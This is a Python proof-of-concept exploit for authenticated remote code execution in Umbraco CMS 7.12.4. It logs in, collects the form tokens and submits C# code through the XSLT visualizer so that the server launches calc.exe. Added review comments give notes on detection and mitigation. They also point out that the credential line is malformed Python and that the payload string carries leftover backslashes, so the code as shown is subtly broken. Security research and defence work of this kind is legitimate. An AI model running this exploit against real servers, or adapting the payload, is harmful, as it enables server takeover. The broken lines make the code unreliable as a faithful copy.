# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
#
# Review notes (defender's reading of this PoC):
#   - Precondition: a valid back-office login (Step 2 posts username/password
#     as JSON); the title states administrator rights are needed. This is a
#     post-authentication admin-to-server privilege jump, not an
#     unauthenticated entry point.
#   - Sink: the XSLT visualizer page requested in Step 3 receives C# source in
#     the "ctl00$body$xsltSelection" form field. The PoC payload only starts
#     calc.exe and returns its stdout; nothing in this script persists or
#     pivots.
#   - Detection: POSTs to /umbraco/developer/Xslt/xsltVisualize.aspx whose
#     xsltSelection field carries C# (e.g. System.Diagnostics.Process) instead
#     of XSLT markup, and back-office logins from unexpected sources, are the
#     observable events.
#   - Mitigation: upgrade per the vendor releases page above (this page does
#     not state a fixed version), keep back-office administrator accounts to a
#     minimum, and restrict or monitor access to the developer section.

import requests;
from bs4 import BeautifulSoup;

def print_dict(dico: dict) -> None:
    # Debug helper: dump a mapping (here a cookie jar) as (key, value) pairs.
    print(dico.items());

print("Start");

# Execute a calc for the PoC
# NOTE(review): the "\ " sequences are what remains of backslash-newline line
# continuations after the file was flattened onto one line. As shown they are
# literal backslash+space characters inside the Python string (Python warns
# about the invalid escape); in the original multi-line source they were
# presumably removed by the continuation -- confirm before treating this text
# as the exact C# that was submitted.
payload = '\ public string xml() \ { string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ \ ';

# Placeholder credentials and target.
# NOTE(review): as shown the first literal is unterminated ("XXXX;), so this
# line does not parse as Python.
login = "XXXX; password="XXXX"; host = "XXXX";

# Step 1 - Get Main page
# One Session object is used throughout so the cookies set here and by the
# login are carried into the later requests.
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
# Credentials are posted as JSON to the back-office authentication API. The
# response (r2) is never inspected, so a failed login is not detected here; it
# would surface in Step 3 as soup.find(...) returning None and the ['value']
# subscript raising TypeError.
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
# Scrape the ASP.NET view-state fields from the form and echo the XSRF cookie
# back as the UMB-XSRF-TOKEN header. The submission therefore looks like a
# normal browser post of this form; the only unusual part is the field content.
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
# Presumably the server compiles and runs the submitted "XSLT" (hence the RCE
# in the title); the C# in `payload` is the entire exploit. The response (r4)
# would carry the command's stdout but is neither checked nor printed.
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");